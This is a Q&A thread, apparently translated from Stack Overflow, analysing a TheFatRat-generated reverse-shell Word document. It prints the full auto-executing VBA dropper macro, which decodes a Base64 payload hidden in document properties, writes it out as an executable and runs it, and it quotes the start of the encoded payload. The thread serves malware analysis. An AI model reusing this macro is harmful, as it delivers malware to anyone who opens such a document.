【问题标题】:Where is Base64 code in TheFatRat Microsoft reverse shell document?TheFatRat Microsoft 反向 shell 文档中的 Base64 代码在哪里?
【发布时间】:2021-02-07 08:09:50
【问题描述】:

我用TheFatRat 创建了一个反向shell Microsoft Word 文档,它主要创建反向shell!

现在,我想对其进行逆向工程,所以我提出了REMNUX(带有一些逆向工程工具的Ubuntu)。

我使用了 oledump.py,输出是:

remnux@remnux:~$ oledump.py kjbk.docm
A: word/vbaProject.bin
 A1:       385 'PROJECT'
 A2:        71 'PROJECTwm'
 A3: M    5871 'VBA/NewMacros'
 A4: m    1073 'VBA/ThisDocument'
 A5:      4400 'VBA/_VBA_PROJECT'
 A6:       734 'VBA/dir'

A3 部分有这些宏:

remnux@remnux:~$ oledump.py kjbk.docm -v(decompress) -s A3

Attribute VB_Name = "NewMacros"
Public Declare PtrSafe Function system Lib "libc.dylib" (ByVal command As String) As Long

Sub AutoOpen()
    On Error Resume Next
    Dim found_value As String

    For Each prop In ActiveDocument.BuiltInDocumentProperties
        If prop.Name = "Comments" Then
            found_value = Mid(prop.Value, 56)
            orig_val = Base64Decode(found_value)
            #If Mac Then
                ExecuteForOSX (orig_val)
            #Else
                ExecuteForWindows (orig_val)
            #End If
            Exit For
        End If
    Next
End Sub

Sub ExecuteForWindows(code)
    On Error Resume Next
    Set fso = CreateObject("Scripting.FileSystemObject")
    tmp_folder = fso.GetSpecialFolder(2)
    tmp_name = tmp_folder + "\" + fso.GetTempName() + ".exe"
    Set f = fso.createTextFile(tmp_name)
    f.Write (code)
    f.Close
    CreateObject("WScript.Shell").Run (tmp_name)
End Sub

Sub ExecuteForOSX(code)
    System ("echo """ & code & """ | python &")
End Sub


' Decodes a base-64 encoded string (BSTR type).
' 1999 - 2004 Antonin Foller, http://www.motobit.com
' 1.01 - solves problem with Access And 'Compare Database' (InStr)
Function Base64Decode(ByVal base64String)
  'rfc1521
  '1999 Antonin Foller, Motobit Software, http://Motobit.cz
  Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
  Dim dataLength, sOut, groupBegin
  
  base64String = Replace(base64String, vbCrLf, "")
  base64String = Replace(base64String, vbTab, "")
  base64String = Replace(base64String, " ", "")
  
  dataLength = Len(base64String)
  If dataLength Mod 4 <> 0 Then
    Err.Raise 1, "Base64Decode", "Bad Base64 string."
    Exit Function
  End If

  
  For groupBegin = 1 To dataLength Step 4
    Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
    numDataBytes = 3
    nGroup = 0

    For CharCounter = 0 To 3

      thisChar = Mid(base64String, groupBegin + CharCounter, 1)

      If thisChar = "=" Then
        numDataBytes = numDataBytes - 1
        thisData = 0
      Else
        thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
      End If
      If thisData = -1 Then
        Err.Raise 2, "Base64Decode", "Bad character In Base64 string."
        Exit Function
      End If

      nGroup = 64 * nGroup + thisData
    Next
    
    nGroup = Hex(nGroup)
    
    nGroup = String(6 - Len(nGroup), "0") & nGroup
    
    pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
      Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
      Chr(CByte("&H" & Mid(nGroup, 5, 2)))
    
    sOut = sOut & Left(pOut, numDataBytes)
  Next

  Base64Decode = sOut
End Function

它显然会解码一些 Base64 代码并运行它,问题是,我在 A1...A6 部分的任何一个文件上都找不到任何 Base64(反向 shell 代码)。那么反向shell代码在哪里呢?

我已经将文件上传到这些位置,密码是 123,它会创建反向 shell 到本地网络(192.168....),所以它是无害的。

Link1, Link2, Link3

【问题讨论】:

    标签: vba ms-word base64 reverse-engineering ole


    【解决方案1】:

    让我们在忘记之前回答一下吧,我敢打赌 TheFatRat 开发人员对此分析不满意,但我找到了反向 shell 代码。

    与 Emotet 恶意软件不同,Base64 代码无法被 oledump(它只查看受感染文档的 word 目录)之类的工具检测到,并且它不会隐藏在主文档 XML 文件中,我确实使用 Ubuntu 打开了 Microsoft Word 文件档案管理器,瞧:

    可执行文件隐藏在 docProps 目录中!它是 Base64 并且包含反向 shell 代码!这将复制到 Windows 临时文件夹。

    第一行:

    <cp:coreProperties>
    <dc:title/>
    <dc:subject/>
    <dc:creator/>
    <cp:keywords/>
    <dc:description>
    TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACTOPDW11mehddZnoXXWZ6FrEWShdNZnoVURZCF3lmehbhGlIXcWZ6FuEaahdRZnoXXWZ+FHlmehVRRw4XfWZ6Fg3quhf9ZnoUQX5iF1lmehVJpY2jXWZ6FAAAA
    

    【讨论】:

      猜你喜欢
      • 1970-01-01
      • 1970-01-01
      • 2019-03-17
      • 2012-09-03
      • 1970-01-01
      • 2018-12-23
      • 2022-01-24
      • 2010-09-13
      • 1970-01-01
      相关资源
      最近更新 更多